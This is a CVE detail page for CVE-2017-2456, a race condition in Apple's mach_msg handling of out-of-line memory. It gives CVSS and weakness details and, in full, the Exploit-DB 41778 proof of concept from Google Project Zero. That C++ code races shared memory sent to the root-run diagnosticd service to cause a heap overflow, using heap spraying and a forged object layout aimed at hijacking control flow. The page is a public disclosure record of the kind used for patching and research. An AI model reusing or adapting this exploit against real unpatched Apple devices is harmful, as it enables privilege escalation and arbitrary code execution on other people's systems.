CVE-2017-2456 : Detail

CVE-2017-2456

7
/
High
10.48%V4
Local
2017-04-01
23h36 +00:00
2017-08-15
07h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the "Kernel" component. A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-362 Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition')
The product contains a concurrent code sequence that requires temporary, exclusive access to a shared resource, but a timing window exists in which the shared resource can be modified by another code sequence operating concurrently.

Metrics

Metrics Score Severity CVSS Vector Source
V3.0 7 HIGH CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

A vulnerability exploitable with Local access means that the vulnerable component is not bound to the network stack, and the attacker's path is via read/write/execute capabilities. In some cases, the attacker may be logged in locally in order to exploit the vulnerability, otherwise, she may rely on User Interaction to execute a malicious file.

Attack Complexity

This metric describes the conditions beyond the attacker's control that must exist in order to exploit the vulnerability.

High

A successful attack depends on conditions beyond the attacker's control. That is, a successful attack cannot be accomplished at will, but requires the attacker to invest in some measurable amount of effort in preparation or execution against the vulnerable component before a successful attack can be expected.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

None

The attacker is unauthorized prior to attack, and therefore does not require any access to settings or files to carry out an attack.

User Interaction

This metric captures the requirement for a user, other than the attacker, to participate in the successful compromise of the vulnerable component.

Required

Successful exploitation of this vulnerability requires a user to take some action before the vulnerability can be exploited. For example, a successful exploit may only be possible during the installation of an application by a system administrator.

Base: Scope Metrics

An important property captured by CVSS v3.0 is the ability for a vulnerability in one software component to impact resources beyond its means, or privileges.

Scope

Formally, Scope refers to the collection of privileges defined by a computing authority (e.g. an application, an operating system, or a sandbox environment) when granting access to computing resources (e.g. files, CPU, memory, etc). These privileges are assigned based on some method of identification and authorization. In some cases, the authorization may be simple or loosely controlled based upon predefined rules or standards. For example, in the case of Ethernet traffic sent to a network switch, the switch accepts traffic that arrives on its ports and is an authority that controls the traffic flow to other switch ports.

Unchanged

An exploited vulnerability can only affect resources managed by the same authority. In this case the vulnerable component and the impacted component are the same.

Base: Impact Metrics

The Impact metrics refer to the properties of the impacted component.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence that one has in the description of a vulnerability.

Environmental Metrics

nvd@nist.gov
V2 7.6 AV:N/AC:H/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 41778

Publication date : 2017-03-29 22h00 +00:00
Author : Google Security Research
EDB Verified : Yes

/* Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1083 When sending ool memory via |mach_msg| with |deallocate| flag or |MACH_MSG_VIRTUAL_COPY| flag, |mach_msg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a shared memory race condition. Exploitation: We need specific code that references the memory twice from |mach_msg|. Here's a snippet of such a function |xpc_dictionary_insert|. v14 = strlen(shared_memory); <<-- 1st v15 = _xpc_malloc(v14 + 41); ... strcpy((char *)(v15 + 32), shared_memory); <<-- 2nd If we change the string's length bigger before |strcpy| is called, it will result in a heap overflow. This bug is triggerable from a sandboxed process. The attached PoC will crash diagnosticd(running as root). It requires more than 512MB memory to run. Tested on macOS Sierra 10.12.2(16C67). clang++ -o poc poc.cc -std=c++11 */ /* macOS/IOS: mach_msg: doesn't copy memory When sending ool memory via |mach_msg| with |deallocate| flag or |MACH_MSG_VIRTUAL_COPY| flag, |mach_msg| performs moving the memory to the destination process instead of copying it. But it doesn't consider the memory entry object that could resurrect the moved memory. As a result, it could lead to a shared memory race condition. Exploitation: We need specific code that references the memory twice from |mach_msg|. Here's a snippet of such a function |xpc_dictionary_insert|. v14 = strlen(shared_memory); <<-- 1st v15 = _xpc_malloc(v14 + 41); ... strcpy((char *)(v15 + 32), shared_memory); <<-- 2nd If we change the string's length bigger before |strcpy| is called, it will result in a heap overflow. This bug is triggerable from a sandboxed process. The attached PoC will crash diagnosticd(running as root). It requires more than 512MB memory to run. Tested on macOS Sierra 10.12.2(16C67). clang++ -o poc poc.cc -std=c++11 */ #include <stdint.h> #include <stdio.h> #include <xpc/xpc.h> #include <assert.h> #include <iostream> #include <CoreFoundation/CoreFoundation.h> #include <dlfcn.h> #include <mach/mach.h> #include <mach-o/dyld_images.h> #include <printf.h> #include <dispatch/dispatch.h> #include <vector> #include <chrono> #include <thread> struct RaceContext { std::vector<uint8_t> payload; size_t race_offset; std::vector<uint8_t> spray; size_t spray_size; }; xpc_object_t empty_request = xpc_dictionary_create(nullptr, nullptr, 0); double now() { return std::chrono::duration<double>(std::chrono::system_clock::now().time_since_epoch()).count(); } mach_port_t createMemoryEntry(memory_object_size_t size) { vm_address_t addr = 0; vm_allocate(mach_task_self(), &addr, size, true); memset((void*)addr, 0, size); mach_port_t res = 0; mach_make_memory_entry_64(mach_task_self(), &size, addr, 0x0000000000200043, &res, 0); vm_deallocate(mach_task_self(), addr, size); return res; } void sendPayload(const RaceContext* ctx) { size_t data_size = ctx->spray_size; mach_port_t mem_entry = createMemoryEntry(data_size); uint8_t* data = nullptr; vm_map(mach_task_self(), (vm_address_t*)&data, data_size, 0LL, 1, mem_entry, 0LL, 0, 67, 67, 2u); memcpy(data, &ctx->payload[0], ctx->payload.size()); for (size_t i = 0x1000; i < data_size; i += 0x1000) { memcpy(&data[i], &ctx->spray[0], ctx->spray.size()); } for (int32_t i = 0; i < 0x4000; i++) { double start = now(); xpc_connection_t client = xpc_connection_create_mach_service("com.apple.diagnosticd", NULL, 0); xpc_connection_set_event_handler(client, ^(xpc_object_t event) { }); xpc_connection_resume(client); xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request)); double duration = now() - start; printf("duration: %f\n", duration); if (duration > 2.0) { xpc_release(client); break; } mach_port_t service_port = ((uint32_t*)client)[15]; void* msg_data = nullptr; vm_map(mach_task_self(), (vm_address_t*)&msg_data, data_size, 0LL, 1, mem_entry, 0LL, 0, 67, 67, 2u); struct { mach_msg_header_t hdr; mach_msg_body_t body; mach_msg_ool_descriptor_t ool_desc; } m = {}; m.hdr.msgh_size = sizeof(m); m.hdr.msgh_local_port = MACH_PORT_NULL; m.hdr.msgh_remote_port = service_port; m.hdr.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND | MACH_MSGH_BITS_COMPLEX, 0); m.hdr.msgh_id = 0x10000000; m.body.msgh_descriptor_count = 1; m.ool_desc.type = MACH_MSG_OOL_DESCRIPTOR; m.ool_desc.address = msg_data; m.ool_desc.size = (mach_msg_size_t)data_size; m.ool_desc.deallocate = 1; m.ool_desc.copy = MACH_MSG_VIRTUAL_COPY; bool stop = true; std::thread syncer([&] { while (stop); xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request)); stop = true; }); size_t race_offset = ctx->race_offset; __uint128_t orig = *(__uint128_t*)&data[race_offset]; __uint128_t new_one = *(const __uint128_t*)"AAAAAAAAAAAAAAAA"; mach_msg(&m.hdr, MACH_SEND_MSG, m.hdr.msgh_size, 0, MACH_PORT_NULL, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); stop = false; while (!stop) { *(__uint128_t*)&data[race_offset] = orig; *(__uint128_t*)&data[race_offset] = new_one; } syncer.join(); *(__uint128_t*)&data[race_offset] = orig; xpc_release(client); } mach_port_deallocate(mach_task_self(), mem_entry); } const void* memSearch(const void* base, const void* data, size_t size) { const uint8_t* p = (const uint8_t*)base; for (;;) { if (!memcmp(p, data, size)) return p; p++; } } void* getLibraryAddress(const char* library_name) { task_dyld_info_data_t task_dyld_info; mach_msg_type_number_t count = TASK_DYLD_INFO_COUNT; task_info(mach_task_self(), TASK_DYLD_INFO, (task_info_t)&task_dyld_info, &count); const struct dyld_all_image_infos* all_image_infos = (const struct dyld_all_image_infos*)task_dyld_info.all_image_info_addr; const struct dyld_image_info* image_infos = all_image_infos->infoArray; for (size_t i = 0; i < all_image_infos->infoArrayCount; i++) { const char* image_name = image_infos[i].imageFilePath; mach_vm_address_t image_load_address = (mach_vm_address_t)image_infos[i].imageLoadAddress; if (strstr(image_name, library_name)){ return (void*)image_load_address; } } return 0; } void initRace(RaceContext* ctx) { struct FakeObject { void* unk[2]; void* ref_to_bucket; void* padd[0x10]; struct { const void* sel; const void* func; } bucket; }; const uint32_t kXpcData[] = {0x58504321, 0x00000005, 0x0000f000, 0x00000964, 0x00000002, 0x69746361, 0x00006e6f, 0x00004000, 0x00000003, 0x00000000, 0x73646970, 0x00000000, 0x0000e000, 0x0000093c, 0x00000001, 0x0000f000, 0x00000930, 0x0000004b, 0x00003041, 0x0000f000, 0x00000004, 0x00000000, 0x00003141, 0x0000f000, 0x00000004, 0x00000000, 0x00003241, 0x0000f000, 0x00000004, 0x00000000, 0x00003341, 0x0000f000, 0x00000004, 0x00000000, 0x00003441, 0x0000f000, 0x00000004, 0x00000000, 0x00003541, 0x0000f000, 0x00000004, 0x00000000, 0x00003641, 0x0000f000, 0x00000004, 0x00000000, 0x00003741, 0x0000f000, 0x00000004, 0x00000000, 0x00003841, 0x0000f000, 0x00000004, 0x00000000, 0x00003941, 0x0000f000, 0x00000004, 0x00000000, 0x00303141, 0x0000f000, 0x00000004, 0x00000000, 0x00313141, 0x0000f000, 0x00000004, 0x00000000, 0x00323141, 0x0000f000, 0x00000004, 0x00000000, 0x00333141, 0x0000f000, 0x00000004, 0x00000000, 0x00343141, 0x0000f000, 0x00000004, 0x00000000, 0x00353141, 0x0000f000, 0x00000004, 0x00000000, 0x00363141, 0x0000f000, 0x00000004, 0x00000000, 0x00373141, 0x0000f000, 0x00000004, 0x00000000, 0x00383141, 0x0000f000, 0x00000004, 0x00000000, 0x00393141, 0x0000f000, 0x00000004, 0x00000000, 0x00303241, 0x0000f000, 0x00000004, 0x00000000, 0x00313241, 0x0000f000, 0x00000004, 0x00000000, 0x00323241, 0x0000f000, 0x00000004, 0x00000000, 0x00333241, 0x0000f000, 0x00000004, 0x00000000, 0x00343241, 0x0000f000, 0x00000004, 0x00000000, 0x00353241, 0x0000f000, 0x00000004, 0x00000000, 0x00363241, 0x0000f000, 0x00000004, 0x00000000, 0x00373241, 0x0000f000, 0x00000004, 0x00000000, 0x00383241, 0x0000f000, 0x00000004, 0x00000000, 0x00393241, 0x0000f000, 0x00000004, 0x00000000, 0x00303341, 0x0000f000, 0x00000004, 0x00000000, 0x00313341, 0x0000f000, 0x00000004, 0x00000000, 0x00323341, 0x0000f000, 0x00000004, 0x00000000, 0x00333341, 0x0000f000, 0x00000004, 0x00000000, 0x00343341, 0x0000f000, 0x00000004, 0x00000000, 0x00353341, 0x0000f000, 0x00000004, 0x00000000, 0x00363341, 0x0000f000, 0x00000004, 0x00000000, 0x00373341, 0x0000f000, 0x00000004, 0x00000000, 0x00383341, 0x0000f000, 0x00000004, 0x00000000, 0x00393341, 0x0000f000, 0x00000004, 0x00000000, 0x00303441, 0x0000f000, 0x00000004, 0x00000000, 0x00313441, 0x0000f000, 0x00000004, 0x00000000, 0x00323441, 0x0000f000, 0x00000004, 0x00000000, 0x00333441, 0x0000f000, 0x00000004, 0x00000000, 0x00343441, 0x0000f000, 0x00000004, 0x00000000, 0x00353441, 0x0000f000, 0x00000004, 0x00000000, 0x00363441, 0x0000f000, 0x00000004, 0x00000000, 0x00373441, 0x0000f000, 0x00000004, 0x00000000, 0x00383441, 0x0000f000, 0x00000004, 0x00000000, 0x00393441, 0x0000f000, 0x00000004, 0x00000000, 0x65746661, 0x00000072, 0x00004000, 0x00000001, 0x00000000, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x00515151, 0x0000f000, 0x00000004, 0x00000000, 0x65746661, 0x00000072, 0x0000f000, 0x00000324, 0x00000032, 0x00003041, 0x0000f000, 0x00000004, 0x00000000, 0x00003141, 0x0000f000, 0x00000004, 0x00000000, 0x00003241, 0x0000f000, 0x00000004, 0x00000000, 0x00003341, 0x0000f000, 0x00000004, 0x00000000, 0x00003441, 0x0000f000, 0x00000004, 0x00000000, 0x00003541, 0x0000f000, 0x00000004, 0x00000000, 0x00003641, 0x0000f000, 0x00000004, 0x00000000, 0x00003741, 0x0000f000, 0x00000004, 0x00000000, 0x00003841, 0x0000f000, 0x00000004, 0x00000000, 0x00003941, 0x0000f000, 0x00000004, 0x00000000, 0x00303141, 0x0000f000, 0x00000004, 0x00000000, 0x00313141, 0x0000f000, 0x00000004, 0x00000000, 0x00323141, 0x0000f000, 0x00000004, 0x00000000, 0x00333141, 0x0000f000, 0x00000004, 0x00000000, 0x00343141, 0x0000f000, 0x00000004, 0x00000000, 0x00353141, 0x0000f000, 0x00000004, 0x00000000, 0x00363141, 0x0000f000, 0x00000004, 0x00000000, 0x00373141, 0x0000f000, 0x00000004, 0x00000000, 0x00383141, 0x0000f000, 0x00000004, 0x00000000, 0x00393141, 0x0000f000, 0x00000004, 0x00000000, 0x00303241, 0x0000f000, 0x00000004, 0x00000000, 0x00313241, 0x0000f000, 0x00000004, 0x00000000, 0x00323241, 0x0000f000, 0x00000004, 0x00000000, 0x00333241, 0x0000f000, 0x00000004, 0x00000000, 0x00343241, 0x0000f000, 0x00000004, 0x00000000, 0x00353241, 0x0000f000, 0x00000004, 0x00000000, 0x00363241, 0x0000f000, 0x00000004, 0x00000000, 0x00373241, 0x0000f000, 0x00000004, 0x00000000, 0x00383241, 0x0000f000, 0x00000004, 0x00000000, 0x00393241, 0x0000f000, 0x00000004, 0x00000000, 0x00303341, 0x0000f000, 0x00000004, 0x00000000, 0x00313341, 0x0000f000, 0x00000004, 0x00000000, 0x00323341, 0x0000f000, 0x00000004, 0x00000000, 0x00333341, 0x0000f000, 0x00000004, 0x00000000, 0x00343341, 0x0000f000, 0x00000004, 0x00000000, 0x00353341, 0x0000f000, 0x00000004, 0x00000000, 0x00363341, 0x0000f000, 0x00000004, 0x00000000, 0x00373341, 0x0000f000, 0x00000004, 0x00000000, 0x00383341, 0x0000f000, 0x00000004, 0x00000000, 0x00393341, 0x0000f000, 0x00000004, 0x00000000, 0x00303441, 0x0000f000, 0x00000004, 0x00000000, 0x00313441, 0x0000f000, 0x00000004, 0x00000000, 0x00323441, 0x0000f000, 0x00000004, 0x00000000, 0x00333441, 0x0000f000, 0x00000004, 0x00000000, 0x00343441, 0x0000f000, 0x00000004, 0x00000000, 0x00353441, 0x0000f000, 0x00000004, 0x00000000, 0x00363441, 0x0000f000, 0x00000004, 0x00000000, 0x00373441, 0x0000f000, 0x00000004, 0x00000000, 0x00383441, 0x0000f000, 0x00000004, 0x00000000, 0x00393441, 0x0000f000, 0x00000004, 0x00000000, 0x00003042, 0x0000f000, 0x00000004, 0x00000000, 0x00003142, 0x0000f000, 0x00000004, 0x00000000, 0x00003242, 0x0000f000, 0x00000004, 0x00000000, 0x00003342, 0x0000f000, 0x00000004, 0x00000000, 0x00003442, 0x0000f000, 0x00000004, 0x00000000, 0x00003542, 0x0000f000, 0x00000004, 0x00000000, 0x00003642, 0x0000f000, 0x00000004, 0x00000000, 0x00003742, 0x0000f000, 0x00000004, 0x00000000, 0x00003842, 0x0000f000, 0x00000004, 0x00000000, 0x00003942, 0x0000f000, 0x00000004, 0x00000000, 0x00303142, 0x0000f000, 0x00000004, 0x00000000, 0x00313142, 0x0000f000, 0x00000004, 0x00000000, 0x00323142, 0x0000f000, 0x00000004, 0x00000000, 0x00333142, 0x0000f000, 0x00000004, 0x00000000, 0x00343142, 0x0000f000, 0x00000004, 0x00000000, 0x00353142, 0x0000f000, 0x00000004, 0x00000000, 0x00363142, 0x0000f000, 0x00000004, 0x00000000, 0x00373142, 0x0000f000, 0x00000004, 0x00000000, 0x00383142, 0x0000f000, 0x00000004, 0x00000000, 0x00393142, 0x0000f000, 0x00000004, 0x00000000, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x51515151, 0x00515151, 0x00008000, 0x00000009, 0x68746d69, 0x67617465, 0x00000000, 0x65746661, 0x00000072, 0x0000f000, 0x00000004, 0x00000000}; const size_t kTagOffset = 0x954; const uintptr_t kSprayedAddr = 0x120101010; //ctx->data.resize(0x10000); ctx->payload.resize(0x1000); ctx->race_offset = kTagOffset - 0x10; memcpy(&ctx->payload[0], kXpcData, sizeof(kXpcData)); *(uintptr_t*)&ctx->payload[kTagOffset] = kSprayedAddr; ctx->spray.resize(0x300); ctx->spray_size = 1024 * 1024 * 512; void* libdispatch = getLibraryAddress("libdispatch.dylib"); FakeObject* predict = (FakeObject*)kSprayedAddr; FakeObject* obj = (FakeObject*)&ctx->spray[kSprayedAddr & 0xff]; obj->ref_to_bucket = &predict->bucket; obj->bucket.sel = memSearch(libdispatch, "_xref_dispose", 14); obj->bucket.func = (void*)0x9999; } int32_t main() { xpc_connection_t client = xpc_connection_create_mach_service("com.apple.diagnosticd", NULL, 0); xpc_connection_set_event_handler(client, ^(xpc_object_t event) { }); xpc_connection_resume(client); xpc_release(xpc_connection_send_message_with_reply_sync(client, empty_request)); RaceContext ctx; initRace(&ctx); printf("attach the debugger to diagnosticd\n"); getchar(); sendPayload(&ctx); return 0; }

Products Mentioned

Configuraton 0

Apple>>Iphone_os >> Version To (including) 10.2.1

Apple>>Mac_os_x >> Version To (including) 10.12.3

Apple>>Tvos >> Version To (including) 10.1.1

Apple>>Watchos >> Version To (including) 3.1.3

References

http://www.securityfocus.com/bid/97137
Tags : vdb-entry, x_refsource_BID
https://www.exploit-db.com/exploits/41778/
Tags : exploit, x_refsource_EXPLOIT-DB
https://support.apple.com/HT207601
Tags : x_refsource_CONFIRM
https://support.apple.com/HT207615
Tags : x_refsource_CONFIRM
http://www.securitytracker.com/id/1038138
Tags : vdb-entry, x_refsource_SECTRACK
https://support.apple.com/HT207602
Tags : x_refsource_CONFIRM
https://support.apple.com/HT207617
Tags : x_refsource_CONFIRM